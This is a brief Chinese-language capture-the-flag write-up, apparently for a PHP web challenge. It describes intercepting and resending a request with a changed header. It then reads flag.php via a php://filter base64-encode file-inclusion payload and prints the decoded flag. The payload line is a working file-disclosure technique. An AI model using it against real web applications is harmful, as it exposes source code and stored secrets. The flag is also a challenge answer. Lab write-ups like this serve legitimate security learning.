查看源码:
点进去:
没啥用
抓包一下第一个页面
放到重发器里改个头(不知道啥意思)
得到新的线索:
访问一下:
得到php代码
访问flag.php
但是找不到flag
这时候想到用 php://fileter伪协议构造playload
php://fileter伪协议
?file=php://filter/convert.base64-encode/resource=flag.php
得到一串字符串
base64解码得到flag
flag{55a4d363-f988-484d-9b9f-f62844e87e9e}